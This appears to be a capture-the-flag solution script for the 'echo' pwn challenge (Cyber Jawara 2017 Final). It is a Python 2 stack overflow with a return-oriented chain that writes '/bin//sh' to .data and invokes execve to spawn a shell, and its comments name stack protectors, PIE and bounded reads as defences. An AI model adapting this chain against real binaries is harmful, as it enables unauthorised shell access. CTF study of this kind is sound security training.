Cyber Jawara 2017 Final - echo (pwn 200)
from struct import pack
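# Overflow input for the "echo" challenge binary (Python 2: str is a byte
# string and the final print emits the raw bytes plus a newline).
#
# Layout: filler bytes, then a return-oriented chain made of gadget addresses
# and data words, each packed as a little-endian 64-bit value ('<Q').
#
# NOTE(review): every address below is an absolute constant, so the chain is
# tied to this exact challenge build. That presumably means a non-PIE binary
# with no stack canary in the overflowed function; confirm against the binary.
# Defensive reading: bounding the vulnerable read is the real fix; a stack
# protector would abort before the first gadget runs, and a position-independent
# build under ASLR would invalidate the hard-coded addresses.

# Padding goes here
# presumably the distance from the buffer to the saved return address
p = 'A' * 10008

# Stage 1: store the 8-byte string '/bin//sh' at the start of .data.
p += pack('<Q', 0x0000000000401817)  # pop rsi ; ret
p += pack('<Q', 0x00000000006cb080)  # @ .data
p += pack('<Q', 0x0000000000479ce6)  # pop rax ; pop rdx ; pop rbx ; ret
p += '/bin//sh'                      # popped into rax (exactly 8 bytes)
p += pack('<Q', 0x4141414141414141)  # padding (consumed by pop rdx)
p += pack('<Q', 0x4141414141414141)  # padding (consumed by pop rbx)
p += pack('<Q', 0x00000000004755c1)  # mov qword ptr [rsi], rax ; ret

# Stage 2: write a zero qword at .data + 8. It terminates the string and is
# reused below as the empty pointer arrays.
p += pack('<Q', 0x0000000000401817)  # pop rsi ; ret
p += pack('<Q', 0x00000000006cb088)  # @ .data + 8
p += pack('<Q', 0x000000000042695f)  # xor rax, rax ; ret
p += pack('<Q', 0x00000000004755c1)  # mov qword ptr [rsi], rax ; ret

# Stage 3: load the three syscall argument registers.
p += pack('<Q', 0x00000000004005d5)  # pop rdi ; ret
p += pack('<Q', 0x00000000006cb080)  # @ .data
p += pack('<Q', 0x0000000000401817)  # pop rsi ; ret
p += pack('<Q', 0x00000000006cb088)  # @ .data + 8
p += pack('<Q', 0x0000000000442d86)  # pop rdx ; ret
p += pack('<Q', 0x00000000006cb088)  # @ .data + 8

# Stage 4: rax = 59 (execve on x86-64 Linux), built by zeroing rax and then
# running the same increment gadget 59 times, as in the original listing.
p += pack('<Q', 0x000000000042695f)  # xor rax, rax ; ret
p += pack('<Q', 0x0000000000467920) * 59  # add rax, 1 ; ret
p += pack('<Q', 0x0000000000468475)  # syscall ; ret

# The single-argument parenthesised form prints the same bytes under Python 2.
print(p)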